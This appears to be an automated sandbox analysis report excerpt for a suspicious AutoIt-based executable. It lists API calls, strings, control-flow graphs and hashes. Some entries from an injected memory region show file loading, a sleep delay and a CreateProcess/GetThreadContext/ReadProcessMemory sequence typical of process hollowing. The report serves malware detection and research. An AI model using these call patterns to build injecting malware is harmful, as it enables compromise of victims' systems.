                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_fseek_memmove_strcat
                                                • String ID: AU3!$EA06
                                                • API String ID: 1268643489-2658333250
                                                • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                Control-flow Graph

                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                • CreatePopupMenu.USER32 ref: 00401204
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated
                                                • API String ID: 129472671-2362178303
                                                • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                Control-flow Graph

                                                APIs
                                                • _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                • std::exception::exception.LIBCMT ref: 00411626
                                                • std::exception::exception.LIBCMT ref: 00411640
                                                • __CxxThrowException@8.LIBCMT ref: 00411651
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                • String ID: ,*H$4*H$@fI
                                                • API String ID: 615853336-1459471987
                                                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                Control-flow Graph (legend: Executed / Not Executed)
                                                control_flow_graph 2065 3ede610-3ede6be call 3edc010 2068 3ede6c5-3ede6eb call 3edf520 CreateFileW 2065->2068 2071 3ede6ed 2068->2071 2072 3ede6f2-3ede702 2068->2072 2073 3ede83d-3ede841 2071->2073 2079 3ede709-3ede723 VirtualAlloc 2072->2079 2080 3ede704 2072->2080 2074 3ede883-3ede886 2073->2074 2075 3ede843-3ede847 2073->2075 2081 3ede889-3ede890 2074->2081 2077 3ede849-3ede84c 2075->2077 2078 3ede853-3ede857 2075->2078 2077->2078 2082 3ede859-3ede863 2078->2082 2083 3ede867-3ede86b 2078->2083 2084 3ede72a-3ede741 ReadFile 2079->2084 2085 3ede725 2079->2085 2080->2073 2086 3ede8e5-3ede8fa 2081->2086 2087 3ede892-3ede89d 2081->2087 2082->2083 2090 3ede86d-3ede877 2083->2090 2091 3ede87b 2083->2091 2092 3ede748-3ede788 VirtualAlloc 2084->2092 2093 3ede743 2084->2093 2085->2073 2088 3ede8fc-3ede907 VirtualFree 2086->2088 2089 3ede90a-3ede912 2086->2089 2094 3ede89f 2087->2094 2095 3ede8a1-3ede8ad 2087->2095 2088->2089 2090->2091 2091->2074 2098 3ede78f-3ede7aa call 3edf770 2092->2098 2099 3ede78a 2092->2099 2093->2073 2094->2086 2096 3ede8af-3ede8bf 2095->2096 2097 3ede8c1-3ede8cd 2095->2097 2101 3ede8e3 2096->2101 2102 3ede8cf-3ede8d8 2097->2102 2103 3ede8da-3ede8e0 2097->2103 2105 3ede7b5-3ede7bf 2098->2105 2099->2073 2101->2081 2102->2101 2103->2101 2106 3ede7c1-3ede7f0 call 3edf770 2105->2106 2107 3ede7f2-3ede806 call 3edf580 2105->2107 2106->2105 2113 3ede808 2107->2113 2114 3ede80a-3ede80e 2107->2114 2113->2073 2115 3ede81a-3ede81e 2114->2115 2116 3ede810-3ede814 CloseHandle 2114->2116 2117 3ede82e-3ede837 2115->2117 2118 3ede820-3ede82b VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03EDE6E1
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03EDE907
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1698859580.0000000003EDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3edc000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                • Instruction ID: de2eb3e16bcab45c33085c8f2761dc2103827a399bc24091e53215b74b0eab34
                                                • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                • Instruction Fuzzy Hash: 47A11C74E00209EBDB14CFA4C898BEEB7B5FF88304F149259E515BB280D7759A41CF94

                                                Control-flow Graph (legend: Executed / Not Executed)
                                                control_flow_graph 2119 401250-40125c 2120 401262-401293 call 412f40 call 401b80 2119->2120 2121 4012e8-4012ed 2119->2121 2126 4012d1-4012e2 KillTimer SetTimer 2120->2126 2127 401295-4012b5 2120->2127 2126->2121 2128 4012bb-4012bf 2127->2128 2129 4272ec-4272f2 2127->2129 2132 4012c5-4012cb 2128->2132 2133 42733f-427346 2128->2133 2130 4272f4-427315 Shell_NotifyIconW 2129->2130 2131 42731a-42733a Shell_NotifyIconW 2129->2131 2130->2126 2131->2126 2132->2126 2134 427393-4273b4 Shell_NotifyIconW 2132->2134 2135 427348-427369 Shell_NotifyIconW 2133->2135 2136 42736e-42738e Shell_NotifyIconW 2133->2136 2134->2126 2135->2126 2136->2126
                                                APIs
                                                  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 3300667738-0
                                                • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                                Control-flow Graph (legend: Executed / Not Executed)
                                                control_flow_graph 2137 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2140 427190-4271ae RegQueryValueExW 2137->2140 2141 40e4eb-40e4f0 2137->2141 2142 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2140->2142 2143 42721a-42722a RegCloseKey 2140->2143 2148 427210-427219 call 436508 2142->2148 2149 4271f7-42720e call 402160 2142->2149 2148->2143 2149->2148
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                • API String ID: 1586453840-614718249
                                                • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                                Control-flow Graph (legend: Executed / Not Executed)
                                                control_flow_graph 2154 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                APIs
                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Window$CreateShow
                                                • String ID: AutoIt v3$edit
                                                • API String ID: 1584632944-3779509399
                                                • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                APIs
                                                  • Part of subcall function 03EDE2B0: Sleep.KERNELBASE(000001F4), ref: 03EDE2C1
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03EDE507
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1698859580.0000000003EDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3edc000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: CreateFileSleep
                                                • String ID: IKD8YWMQMNSKBQKBJUDEDU6ECDYOLQ
                                                • API String ID: 2694422964-4271138072
                                                • Opcode ID: feeae1f31a4e675568598818b0a19e80bcdf37427a407280b660ff29177cecde
                                                • Instruction ID: e4602f8add9d9d6c67df8b8eb7a2dfddef05794b33dd440078d390c55618eb4d
                                                • Opcode Fuzzy Hash: feeae1f31a4e675568598818b0a19e80bcdf37427a407280b660ff29177cecde
                                                • Instruction Fuzzy Hash: 2461A270D04288DAEF11DBF4C858BDEBBB4AF55304F044288E6487B2C1D7BA5B49CB66
                                                APIs
                                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                • _wcsncpy.LIBCMT ref: 00401C41
                                                • _wcscpy.LIBCMT ref: 00401C5D
                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                • String ID: Line:
                                                • API String ID: 1874344091-1585850449
                                                • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Close$OpenQueryValue
                                                • String ID: Control Panel\Mouse
                                                • API String ID: 1607946009-824357125
                                                • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                APIs
                                                • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                • _wcsncpy.LIBCMT ref: 004102ED
                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                • _wcsncpy.LIBCMT ref: 00410340
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                • String ID:
                                                • API String ID: 3170942423-0
                                                • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 03EDDADD
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EDDB01
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EDDB23
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1698859580.0000000003EDC000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDC000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3edc000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                • Instruction ID: aea23c9d6a84867e3e9f22dd5b2ae86d136ba13590ca702fe9c7c3539daa73fc
                                                • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                • Instruction Fuzzy Hash: 4C62F930A14258DBEB24CFA4CC50BEEB376EF58304F10A1A9D10DEB294E7759E81CB59
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: Error:
                                                • API String ID: 4104443479-232661952
                                                • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                APIs
                                                • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                  • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                  • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                  • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                  • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                  • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                Similarity
                                                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                • String ID: X$pWH
                                                • API String ID: 85490731-941433119
                                                • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                APIs
                                                • _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • _memmove.LIBCMT ref: 00401B57
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                Similarity
                                                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                • String ID: @EXITCODE
                                                • API String ID: 2734553683-3436989551
                                                • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                Similarity
                                                • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                Similarity
                                                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                • String ID:
                                                • API String ID: 1794320848-0
                                                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                Similarity
                                                • API ID: Process$CurrentTerminate
                                                • String ID:
                                                • API String ID: 2429186680-0
                                                • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                APIs
                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                Similarity
